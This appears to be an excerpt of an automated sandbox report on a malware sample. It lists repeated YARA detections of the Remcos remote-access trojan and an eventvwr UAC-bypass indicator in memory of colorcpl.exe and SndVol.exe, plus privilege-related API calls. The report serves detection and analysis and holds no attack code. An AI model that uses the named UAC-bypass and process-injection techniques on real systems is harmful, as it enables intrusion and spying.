                  Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@20/11@5/2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_00415C90
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048F6A28 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_048F6A28
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_00415C90
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D46A28 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_06D46A28
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB7FE2 GetDiskFreeSpaceA,0_2_02EB7FE2
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECAD9C CreateToolhelp32Snapshot,0_2_02ECAD9C
